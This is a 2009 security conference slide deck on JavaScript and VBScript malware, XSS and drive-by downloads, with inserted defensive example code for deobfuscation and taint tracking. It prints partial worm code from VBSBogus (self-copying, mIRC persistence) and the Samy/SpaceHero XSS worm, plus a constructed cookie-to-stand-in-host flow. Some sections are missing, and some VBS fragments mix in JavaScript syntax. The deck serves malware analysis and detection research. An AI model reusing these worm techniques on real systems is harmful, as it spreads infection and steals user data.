Research & Development
Operational Cryptology & Virology Lab.

JavaScript and VisualBasicScript Threats: Different scripting languages for different malicious purposes
JACOB Grégoire (1, 2)
(1) Superior School of Computing, Electronic and Automatic (ESIEA), Operational Cryptology & Virology Lab.
(2) Orange Labs, Security and Trusted Transactions (MAPS/STT).
18th International EICAR Conference, BERLIN – May 2009
May 2009/G. Jacob – p 2 research & development France Telecom Group/ESIEA
Outline

Context
- Increasing popularity of scripting languages
- Additional extensions to increase interactivity
- New attack vectors through the web browser
- 70% of the sites from the Top 100 host malicious code (1)
- 46% of additional malicious sites from 2008 to 2009 (1)
(1) According to the WebSense Report [01]

Problematics
- What are the differences between the scripting languages?
- Which protections are deployed and which attacks remain possible?
- Does the introduction of extensions mean new attack holes?

Summary
1. Introduction to JavaScript and VisualBasicScript
2. Malicious potential of JavaScript and VisualBasicScript
3. Study cases: script malware
4. Static or dynamic analysis? The obfuscation problem
5. Dynamic analysis: event traces and tainting
6. Conclusions

1 Introduction to the JS and VBS scripting languages and their interpreters

1.1 JS and VBS, equivalent languages?
At first glance, the answer would be "yes"…
- Interpreted languages
- Embedded in web pages for dynamic enhancements
… after a little digging, differences arise

|           | JavaScript | VisualBasicScript |
|-----------|------------|-------------------|
| History   | Created by Netscape; syntax derived from C/C++ | Created by Microsoft; syntax derived from Visual Basic |
| Principle | Procedural and object-based* using a prototype approach | Procedural and object-based* using a class approach |

* Not fully object-oriented: no support of inheritance and polymorphism

1.2 Available features in JS and VBS
Features of the core language
- Structure:
  • functions
  • loops
  • conditionals
- Manipulations:
  • math expressions
  • character strings
  • regular expressions
  • basic user interactions
- No access to files, web pages or the network in the core!
- JS core is compliant with the widespread ECMAScript standard [02]

Additional extensions in JavaScript
[Diagram: JS and its extensions. Labels: ActiveX (through IE only); XPCOM (through FF only); DOM; AJAX; LiveConnect; ADO; current web page; applications, libraries, files, registry…; web or XML servers; Java Virtual Machine; databases; local or through ASP pages]
ADO = ActiveX Data Objects
AJAX = Asynchronous JS and XML
ASP = Active Server Page
DOM = Document Object Model
XPCOM = Cross-Platform Component Object Model

Additional extensions in VisualBasicScript
[Diagram: VBS and its extensions. Labels: ActiveX; AJAX; DOM; ADO; WMI; ADSI; current web page; applications, libraries, files, registry…; web or XML servers; Active Directory; Windows environment; databases]
ADO = ActiveX Data Objects
ADSI = Active Directory Service Interfaces
AJAX = Asynchronous JS and XML
WMI = Windows Management Instrumentation

1.3 Constraints of scripting languages
Scripts imply available source code
- Strong constraint from the attacker's perspective to remain undetected
Scripts require an interpreter for execution
- Portability issues

|                       | JavaScript | VisualBasicScript |
|-----------------------|------------|-------------------|
| Main interpreters     | Majority of web browsers | Internet Explorer only (IE); Internet Information System (IIS); Windows Scripting Host (WSH) |
| Embedded interpreters | Quicktime [03]; PDF tools [04]; Adobe Flash; OpenOffice; … | |

Observations
- Contrary to JS, VBS is proprietary and not cross-browser
  • less and less used for web pages or inside applications
- VBS has local interpreters under all recent Windows versions
  • increasing use for stand-alone scripts such as administration scripts (1)
(1) In competition with PowerShell

1.4 Services provided by the interpreter
Code execution
- Compilation (syntax checking) and interpretation in two passes
- Mandatory support of the language core
- Optional support of extensions
  • Extensions require interfaces with the dedicated handlers
  • Interpreters do not support all extensions, e.g. ActiveX under Firefox requires additional plugins
Security enforcement
- Sandboxing
- Security policies restricting access to the interpreter services
  • Restrict execution to signed scripts
  • Same Origin Policy in browser (both JS and VBS)

Same Origin Policy (SOP) [05]
- Instantiated in the web browser
- Origin = (protocol, domain, port)
- Derives access rights for the script elements from their URL
- Read and write access only to elements sharing the same origin:
  • Constrains DOM manipulations
  • Constrains URL requests through AJAX

Same Origin Policy (SOP) [05]
Origin (example from the Mozilla Developer Center)

| URL | Outcome |
|-----|---------|
| https://store.company.com/secure.html | Different protocol |
| http://store.company.com:81/dir/etc.html | Different port |
| http://news.company.com/dir/other.html | Different host |
| file://C:/Documents and Settings/.../Temporary Internet Files/Cookie:[email protected]/ | Different protocol |
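
The origin comparison behind this table, as an added example that is not part of the original slides. The reference page URL `PAGE` and the function names are assumptions; the slide's own reference URL did not survive in the text.

```javascript
// Added example: origin tuple (protocol, host, port) comparison as on the slide.
// PAGE is an assumed reference page, not a value taken from the slides.
const PAGE = "http://store.company.com/dir/page.html";
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Origin tuple of a URL; an omitted port falls back to the scheme default.
function originOf(url) {
  const u = new URL(url);
  return {
    protocol: u.protocol,
    host: u.hostname.toLowerCase(),
    port: u.port || DEFAULT_PORTS[u.protocol] || "",
  };
}

// Names the first tuple component that differs, or reports a shared origin.
function compareOrigins(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  for (const part of ["protocol", "host", "port"]) {
    if (oa[part] !== ob[part]) {
      return { same: false, reason: "different " + part };
    }
  }
  // file:, data: and similar schemes carry no host, so no origin is shared.
  if (!(oa.protocol in DEFAULT_PORTS)) {
    return { same: false, reason: "no host-based origin" };
  }
  return { same: true, reason: "same origin" };
}

// A script on PAGE may read or write `target` only when the origins match.
function mayAccess(target) {
  return compareOrigins(PAGE, target).same;
}
```

The path plays no role: only the three tuple components decide, and an explicit `:80` on an `http` URL equals the omitted default port.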

2 Malicious potential of JS and VBS

2.1 Different trends for JS/VBS attacks
Nature of attacks according to the language
- Depends on portability and available extensions
- Local execution induces standard infection scenarios
- Browser execution induces web attacks
- Bypass existing security protections
Observations
- VBS is a vector of stand-alone malware (e.g. LoveLetter)
- JS is mainly a vector of web attacks for reconnaissance, privacy intrusions or usurpations (e.g. XSS, XSRF, XST) [06] but …
- … JS enables drive-by download for stand-alone malware (e.g. Feebs)
- … JS enables the propagation of XSS worms [07] (e.g. Samy)

2.2 Circumventing the SOP
The Same Origin Policy is not the ultimate defense [08]
- Legitimate bypass:
  • Include images or style sheets from other domains
- Bypass through implementation vulnerabilities:
  • IE exploit in XmlHttpRequest (2005) [09]
  • Exploit using XBL binding on unloaded document (2008) [10]
- Restriction to web browsers:
  • Policy extended to coexisting scripts (Flash) or external referenced scripts
  • No longer applied to browser helpers or plugins [13]
  • No longer applied in local interpreter

Top 10 Web Attack Vectors in Second Half of 2008 (1)
1. Browser vulnerabilities
2. Rogue antivirus/social engineering
3. SQL injection
4. Malicious Web 2.0 components
5. Adobe Flash vulnerabilities
6. DNS Cache Poisoning and DNS Zone file hijacking
7. ActiveX vulnerabilities
8. RealPlayer vulnerabilities
9. Apple QuickTime vulnerabilities
10. Adobe Acrobat Reader PDF vulnerabilities
(1) According to the WebSense Report [01]

2.3 Reminders on XSS
Attack prevalence
- In 2008, 82% of websites were still vulnerable to various web attacks [14]
- In 2006, 71% of the audited sites were vulnerable to XSS [15]
- Blacklist of vulnerable websites [16]
XSS principles [17,18]
- Force a website to echo executable code
- Server acts as a simple relay
- Code is loaded in the user's browser
- Code is executed with the website privileges

Persistent XSS attacks
- Store XSS code into a persistent area of a visited page
- Attack is executed when a visitor loads the page in their browser
- Well adapted to community sites, forums or open comments
[Diagram: the attacker stores <script>xss attack</script> on the website; the user loads the page and the code executes in the user's browser]

Non-persistent XSS attacks
- Crafted link points to the vulnerable site and contains the attack code
- Clicking on the link sends the crafted request to the site
- Response page is built using request inputs (e.g. search engine)
- Attack code is loaded and executed with the response page
[Diagram: the attacker crafts a link with embedded code (www.link.com\var?code); the user clicks it; the website returns a response page containing <script>xss attack</script>, which executes in the user's browser]

2.4 Drive-by download
Principle [19]
- Pull-based technique to download and execute stand-alone malware
- Relies on XSS attacks for download (e.g. through persistent media content)
- Found at 450.000 URLs out of 4.500.000 in 2007
- More than 18 million attempts in 2008 [20]
Automated toolkits
- Generating web attacks for drive-by download
- No real technical skills needed
- Mpack, Neosploit, Icepack, El Fiesta, Adpack…

Overview of Mpack [21]
- Complete website containing exploits for download
- Only requires configuration, online deployment and advertising
  • Search keywords, advertisements on other sites, URL similar to popular…
- Configuration: how easy?
- Presentation of the tool
  • Index.php: fingerprints the browser and launches related exploits
  • Mdac4.php: exploit for IE
  • Cryptor.php: obfuscation
  • File.php: configures the downloaded malware
  • Settings.php: site administration
  • Stat.php: statistics on infections

2.4 Basic protection against attacks
Detection by signature scanning
- Traditional AV signatures against stand-alone malware
- Vulnerability signatures against web exploits
  • Scanning scripts locally to the browser (e.g. WebInspect, Cenzic HailStorm…)
  • Scanning the network flow, which cannot check dynamically built content [22]
  • Compromise: recursively rebuilding dynamic content from incoming traffic before submitting it to the browser [23]
Prevention against web attacks
- Filtering data submitted by users on the server side
  • Filtering tag characters (e.g. <, >) or keywords (e.g. script, javascript)
  • Existing evasion techniques [24]
- Tag untrusted inputs from the user
  • Detect their use in the construction of responses [25]
- Systematic requests for the user's authorization
  • Forbidding transparent communications (AJAX)

3 Study cases: script malware

3.1 Stand-alone Malware in VBS
- Script reusing similar techniques to executables
IRC Worm Example: VBSBogus
- Relies on the Direct Client to Client protocol (DCC)
[Diagram labels: Attacker; Infected User; User; original infection; IRC client configuration; DCC event; triggered DCC send]
- Duplication: uses the file system: "Scripting.FileSystemObject"
- Duplication methods: 1) single block read-write
    set f = fso.OpenTextFile(Wscript.ScriptFullName,1);
    var mecode = f.Read(worm size);
    set nw = fso.CreateTextFile( "C:\a.b" );
    nw.WriteLine(mecode);
- Duplication methods: 2) direct transfer
    fso.CopyFile(Wscript.ScriptFullName,
    "C:\Windows\help\Bogus.vbs" );
  Equivalents: fso.MoveFile or file.Copy
  [Slide annotation: Self-Reference]
- Residency: uses the configuration file of mIRC: "script.ini" [26]
- Automatic event-triggered command
    set ini = fso.opentextfile( "C:\mirc\script.ini" )
    ini.WriteLine "[script]"
    //Script executed when mirc launched
- Propagation: sending over IRC channel
- If DCC auto-get is activated, files are accepted without notification
- Analysis of the worm body by functional blocks
  • Code samples reformatted, deobfuscated and stripped of error handling
[Slide annotations: '\n' to avoid keyword stripping; Worm body]

3.2 Web-based Malware in JS
- Script using web-based attacks
XSS Worm Example: JS.SpaceHero Worm [27]
- First block: recovering the self-reference
    //Recovers the html code inside the current web page
    function g(){ //Relies on the DOM architecture
      var D = document.body.createTextRange();
      var C = D.htmlText;
      if (C){ return C; } else { return document.body.innerHTML; }
    }
- Code localization and formatting
    var AA = g(); //Gets the html code of the page
    var AB = AA.indexOf( "mycode" ); //Search for mycode id
    var AC = AA.substring(AB,AB+4096); //Worm body substring
    var AD = AC.indexOf( "DIV" );
    var AE = AC.substring(0,AD);
    var AF;
    if (AE){ //Rebuild div tag with the worm code as a string
      AF = " but most of all, samy is my hero. <div id=" +AE+"DIV>" ;
    }
- Second block: information recovery
- Parse request to collect information about the user being infected
    function getQueryParams(){
      var E = document.location.search; //Access request URL
      var F = E.substring(1,E.length).split( '&' );
      var AS = new Array();
      for ( var O = 0; O < F.length; O++){
        var I=F[O].split( '=' ); //Split parameters and values
        AS[I[0]]=I[1]; //Associative table
      }
      return AS;
    }
    //Example AS = ["fuseaction" - "user.viewProfile",
    //             "friendID" - "XXXXXXXXX" ]
- Third block: AJAX communication
- What's left?
  • Execution of dynamically built strings!

Is obfuscation really deployed?
- The answer is yes
- Obfuscation is more advanced in JS because of short XSS attacks
- Same techniques are feasible in VBS but …
  • Stand-alone malware, being complex, deploys less evolved techniques

4.2 Script obfuscation
String execution
- eval/execute provided by the core of the language
- onload/onunload and other events provided by the DOM
- document.write/writeln provided by the DOM
  • Rewrite the web page, code is executed on loading
String obfuscation
- Character encoding (e.g. chr, encode, escape)
- String splitting
- String formatting or ciphering
[Slide annotations: Easy to reverse by normalization: decoding and concatenation; Hard to reverse without dynamic execution]
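
Normalization by decoding and concatenation, as an added example that is not code from the original slides or from any tool they cite. It handles double-quoted JavaScript literals only; the sample input, the keyword list and all function names are constructed for illustration.

```javascript
// Added example: static normalization (decoding + concatenation) of string
// obfuscation. SAMPLE is constructed and harmless.
const SAMPLE = [
  'var a = "docu" + "ment." + "wri" + "te";',
  'var b = unescape("%65%76%61%6c");',
  'var c = String.fromCharCode(60, 100, 105, 118, 62) + "x";',
].join("\n");

const quote = (s) => JSON.stringify(s);

// Parses a double-quoted literal; returns null for escapes JSON cannot read.
function unquote(literal) {
  try { return JSON.parse(literal); } catch (e) { return null; }
}

// Decodes %XX and %uXXXX sequences as produced by escape().
function decodePercent(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (m, wide, narrow) => String.fromCharCode(parseInt(wide || narrow, 16)));
}

// Rewrites decodable calls and literal concatenations until nothing changes.
function normalize(source) {
  let out = source;
  let previous;
  do {
    previous = out;
    out = out.replace(/String\.fromCharCode\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)/g,
      (m, args) => quote(String.fromCharCode(...args.split(",").map(Number))));
    out = out.replace(/unescape\(\s*("(?:[^"\\]|\\.)*")\s*\)/g, (m, lit) => {
      const text = unquote(lit);
      return text === null ? m : quote(decodePercent(text));
    });
    out = out.replace(/("(?:[^"\\]|\\.)*")\s*\+\s*("(?:[^"\\]|\\.)*")/g, (m, a, b) => {
      const left = unquote(a);
      const right = unquote(b);
      return left === null || right === null ? m : quote(left + right);
    });
  } while (out !== previous);
  return out;
}

const KEYWORDS = ["eval", "execute", "document.write", "onload"];

// Keywords visible only after normalization, i.e. hidden by the obfuscation.
function revealedKeywords(source) {
  const clean = normalize(source);
  return KEYWORDS.filter((k) => clean.includes(k) && !source.includes(k));
}
```

Strings that are formatted or ciphered by script-defined routines pass through unchanged, which is the case the slide marks as needing dynamic execution.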
Efficient?

4.3 Deobfuscation techniques
Simulation-based (e.g. CaffeineMonkey, JSunpack) [35,36,37]
- Run the script inside an interpreter
- Catch operations where strings are executed
- Pro: independent from the browser
- Cons: problems of coverage with undefined objects, extensions
Browser hooking (e.g. Ultimate Deobfuscator) [38]
- Interpreter attached to a web browser
- Hooking execution operations in DLLs
  • Interpreter and extension handlers
- Pro: good coverage with no risk of simulation detection
- Cons: limited to a single browser, requires execution containment
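
The simulation-based approach in miniature, as an added example that is not code from CaffeineMonkey, JSunpack or the original slides. The hooks, event format and sample script are constructed; `new Function` gives no containment, so the example assumes real samples are only ever run inside an isolated analysis machine.

```javascript
// Added example: catch strings at the point where a script executes them.
// new Function is NOT a containment boundary. SAMPLE is constructed and harmless.
const SAMPLE = [
  'var a = "docu" + "ment.wr";',
  'var b = "ite(\'<p>hidden</p>\');";',
  'eval(a + b);',
  'new ActiveXObject("Scripting.FileSystemObject");',
].join("\n");

// Runs `script` with eval and document.write replaced by logging hooks and
// returns the ordered list of events {sink, depth, code}.
function traceStringExecution(script, maxDepth = 8) {
  const events = [];
  const log = (sink, depth, code) => {
    events.push({ sink, depth, code: String(code) });
  };

  function run(code, depth) {
    if (depth > maxDepth) {
      log("depth-limit", depth, "");
      return;
    }
    const hookedEval = (text) => {
      log("eval", depth, text);
      // Follow the next layer. It runs in a fresh scope, so variables of the
      // outer layer are not visible to it (a limit of this small simulation).
      run(String(text), depth + 1);
    };
    const fakeDocument = {
      cookie: "",
      write(...parts) {
        const html = parts.join("");
        log("document.write", depth, html);
        // Inline scripts written to the page execute when it is parsed.
        for (const m of html.matchAll(/<script[^>]*>([\s\S]*?)<\/script>/gi)) {
          run(m[1], depth + 1);
        }
      },
      writeln(...parts) { this.write(...parts, "\n"); },
    };
    try {
      // Parameters shadow the real eval/document for the analysed code only.
      new Function("eval", "document", code)(hookedEval, fakeDocument);
    } catch (err) {
      // Typical coverage gap: objects the simulated environment does not define.
      log("error", depth, err.name + ": " + err.message);
    }
  }

  run(String(script), 0);
  return events;
}
```

On `SAMPLE` the trace shows the rebuilt string reaching `eval`, the nested `document.write`, and then an error event for the undefined `ActiveXObject`, which is the coverage problem listed under "Cons".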
Efficient?
- Demo of an extended version of Caffeine Monkey

5.3 Tainting
- Simple event correlation misses data flow (e.g. accessed cookie contained in the new location set)
Tainting principles [41]
- Tainted sources made up of sensitive data
  • Information with potential abuse
  • cookies, history…: privacy breaches
  • browser version, URLs, domains…: attack launching
- Taint propagation
  • Inside the interpreter and towards and from extension handlers
  • Propagation through assignment, computation and indirect control
- Sensitive sinks where data is maliciously used or transmitted
  • Changing location, form submission, XmlHttpRequests

5.4 Joining collection and tainting
Features of the designed collection tool
- Accesses to extensions constitute the collected events
- Tainting support for the manipulated strings
  • Tainting according to the source (self-reference, private or received data…)
  • Taint propagation through manipulations (concatenate, split, replace…)
- Checking for tainted parameters on logged events
Tool development
- Extension of CaffeineMonkey to log additional events
- Independent from browsers (IE, FF, etc.)
- Virtualized extensions
  • Manipulating fake pages for DOM, fake files or mails for ActiveX
  • Handling events and callback routines for AJAX
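
Source labelling, propagation through string manipulations and the check at sensitive sinks (sections 5.3 and 5.4), as an added example that is not the tool presented in the slides. Class, label and sink names and both scenarios are constructed; only propagation through assignment and computation is modelled, not indirect control flow.

```javascript
// Added example: taint labels on strings, propagated through manipulations and
// checked at sensitive sinks. All names here are illustrative.
class TaintedString {
  constructor(value, taints = []) {
    this.value = String(value);
    this.taints = new Set(taints);
  }
  static from(x) {
    return x instanceof TaintedString ? x : new TaintedString(x);
  }
  // The result carries the union of the taints of every operand.
  static derive(value, ...operands) {
    const taints = operands.flatMap((o) => [...TaintedString.from(o).taints]);
    return new TaintedString(value, taints);
  }
  concat(...others) {
    const tail = others.map((o) => TaintedString.from(o).value).join("");
    return TaintedString.derive(this.value + tail, this, ...others);
  }
  split(separator) {
    return this.value.split(separator).map((p) => TaintedString.derive(p, this));
  }
  replace(pattern, replacement) {
    const text = TaintedString.from(replacement).value;
    return TaintedString.derive(this.value.replace(pattern, text), this, replacement);
  }
  substring(start, end) {
    return TaintedString.derive(this.value.substring(start, end), this);
  }
}

class EventCollector {
  constructor() { this.events = []; }
  // Sources: label data as it enters the script from an extension.
  source(label, value) { return new TaintedString(value, [label]); }
  // Sinks: log the access and flag parameters that carry any taint.
  sink(name, param) {
    const p = TaintedString.from(param);
    const taints = [...p.taints].sort();
    const event = { sink: name, value: p.value, taints, flagged: taints.length > 0 };
    this.events.push(event);
    return event;
  }
}

// Constructed scenario: an accessed cookie ends up in the new location set.
function cookieToLocationScenario() {
  const c = new EventCollector();
  const cookie = c.source("private", "session=abc123"); // stands for document.cookie
  const token = cookie.split("=")[1];                   // still tainted
  const url = new TaintedString("http://collector.invalid/?c=").concat(token);
  c.sink("location.set", "http://site.invalid/home");   // untainted navigation
  c.sink("location.set", url);                          // flagged
  return c.events;
}

// Constructed scenario: self-reference and received data merged into a request.
function requestScenario() {
  const c = new EventCollector();
  const page = c.source("self-reference", '<div id="mycode">BODY</div>');
  const reply = c.source("received", "token=42");
  const body = page.substring(0, 16).replace("mycode", "x").concat("&", reply);
  return c.sink("XMLHttpRequest.send", body);
}
```

Correlating the two `location.set` events alone cannot tell them apart; the taint set on the parameter is what separates the navigation carrying the cookie from the ordinary one.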

Demo tainting: Psyme Trojan (drive-by download)
[Screenshot annotations]
- Tainted data from XMLHttpRequest
- Taint propagation through write operation
- Executing file containing tainted data
- Type 3 = Received data
- Source = XMLHttpRequest

Demo tainting: SpaceHero (XSS propagation)
[Screenshot annotations]
- Call callback function
- Access self-reference
- Taint propagation inside request
- Store callback function
- Type F = Self-Reference

6 Conclusions

6 Considerations
Key points of the tutorial
- The attack nature depends on the language features and portability
  • VBS is mainly a vehicle for stand-alone malware
  • JS is mainly a vehicle for web-based malware
- Technical means of stand-alone and web-based malware differ
  • Stand-alone malware infects the user system locally
  • Web-based malware infects servers as relays to reach the user through the browser
- Purposes of stand-alone and web-based malware converge
  • Register in the system
  • Access personal, professional and financial data
  • Malware is now a business (credit card market, zombie networks…)

Perspectives
- Study the use of event collection and tainting on other attacks
  • XSS is not the only attack: XSRF, XTRACE…
- Study additional scripting languages
  • JavaScript and VisualBasicScript are not the only languages: PHP, ActiveScript from Flash…
- Browsers and JavaScript supported by portable devices
  • MiniOpera for example partially supports the DOM and AJAX [42]
  • Additional extensions specific to mobile? SMS, phone book, etc.

Thank you for your attention,
Any questions?

References
[01] WebSense Security Labs – "State of Internet Security", White Paper Q3 – Q4, 2008.
[02] ECMA International – "ECMAScript Language Specifications", Standard ECMA-262, 3rd revision, 1999.
[03] Apple Computer Inc – "JavaScript Scripting Guide for QuickTime", 2005.
[05] Jesse Ruderman – "The Same Origin Policy", 2001. http://www.mozilla.org/projects/security/components/same-origin.html
[06] Martin Johns – "On JavaScript Malware and Related Threats", Journal in Computer Virology, Vol. 4, No. 3, 2008.
[07] Jeremiah Grossman – "Cross-Site Scripting Worms and Viruses – The impending threat and the best defense", WhiteHat Security, 2006.
[08] Justin Schuh – "Same-Origin Policy Part 1: Why we're stuck with Things like XSS and XSRF", The Art of Software Security Assessment, 2007. http://tassoa.com/index.php/2007/02/08/same-origin-policy.html
[09] Amit Klein – "Exploiting the XmlHttpRequest object in IE – Referrer spoofing and a lot more...", 2005. http://www.cgisecurity.Com/lib/XmlHTTPResquest.shtml#
[10] Mozilla Foundation Security Advisory – "XSS and JavaScript Privilege Escalation", MFA-2008-68 (CVE-2008-5511), 2008. http://www.mozilla.org/annouce/2008/mfsa2008-68.html
[11] Jesse Burns – "Cross-Site Reference Forgery – An introduction to a common web application weakness", Version 1.1, Information Security Partners, 2005.
[12] Jeremiah Grossman – "Cross-Site Tracing (XST) – The new techniques and emerging threats to bypass current web security measures using trace and xss", WhiteHat Security, 2003.
[13] Mike Ter Louw, Jim Soon Lim, V.N. Venkatakrishnan – "Enhancing Web-Browser Security against Malware Extensions", Journal in Computer Virology, Vol. 4, No. 3, 2008.
[15] Michael Sutton – "How prevalent are XSS vulnerabilities?", 2007. http://www.communities.hp.com/securitysoftware/blogs/msutton/archive/2007/01/31/How-Prevalent-Are-XSS-Vulnerabilities_3F00_.aspx
[16] Point Blank Security – "The XSS Blacklist #2", 2005. http://www.pointblanksecurity.com/xss/xss2.php
[17] David Endler – "The Evolution of Cross-Site Scripting Attacks", iALERT White Paper, iDEFENSE, 2002.
[18] Cgisecurity – "The Cross-Site Scripting (XSS) FAQ", 2002. http://www.cgisecurity.com/xss-faq.html
[19] Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra Modadugu – "The Ghost in the Browser: Analysis of Web-based Malware", USENIX HotBots, 2007.
[20] Symantec – "Web Based Attacks", White Paper, 2009.
[22] Helen J. Wang, Chuanxiong Guo, Daniel R. Simon and Alf Zugenmaier – "Shield: Vulnerability-Driven Network Filters for Preventing Known Vulnerability Exploits", SIGCOMM, 2004.
[23] Charles Reis, John Dunagan, Helen J. Wang, Opher Dubrovsky and Saher Esmeir – "BrowserShield: Vulnerability-Driven Filtering of Dynamic HTML", ACM Transactions on the Web (TWEB), Vol. 1, No. 3, 2007.
[25] Kevin Lam – "MS Anti-cross Site Scripting Library V1.5: Protecting the contoso bookmark page", MSDN, 2006. http://msdn.microsoft.com/en-us/library/aa973813.aspx
[26] mIRC Faq – "Some notes on "programming" in Mirc". http://www.mirc.com/faq7.html#section7
[27] Samy – "Technical explanation of The MySpace Worm", 2005. http://namb.la/popular/tech.html
[28] The HP Security Laboratory – "XSS+Ajax worm attacking Yahoo mail users", 2006. http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2006/06/13/XSS_2B00_Ajax-worm-attacking-Yahoo-mail-users.aspx
[33] Arjun Guha, Shriram Krishnamurthi and Trevor Jim – "Using Static Analysis for Ajax Intrusion Detection", International World Wide Web Conference, 2009.
[34] Jean-Yves Marion and Daniel Reynaud-Plantey – "Practical Obfuscation by Interpretation", 3rd Workshop on the Theory of Computer Viruses (WTCV), 2008.
[35] Ben Feinsten, Daniel Peick – "Caffeine Monkey – Automated collection, detection and analysis of malicious Javascript", Black Hat USA, 2007.
[38] Stephan Chenette – "The Ultimate Deobfuscator", ToorConX, 2008.
[39] David Wagner – "Janus: an approach for confinement of untrusted applications", Technical Report CSD-99-1056, 1999.
[40] Oystein Hallaraker and Giovanni Vigna – "Detecting Malicious JavaScript Code in Mozilla", Proceedings of the 10th IEEE International Conference on Engineering of Complex Computer Systems, 2005.
[41] Philipp Vogt, Florian Nentwich, Nenad Jovannovic, Engin Kirda, Christopher Kruegel and Giovanni Vigna – "Cross-Site Scripting Prevention with Dynamic Data Tainting and Static Analysis", Proceeding of the Network and Distributed System Security Symposium (NDSS), 2007.
[42] http://dev.opera.com/articles/view/javascript-support-in-opera-mini-4/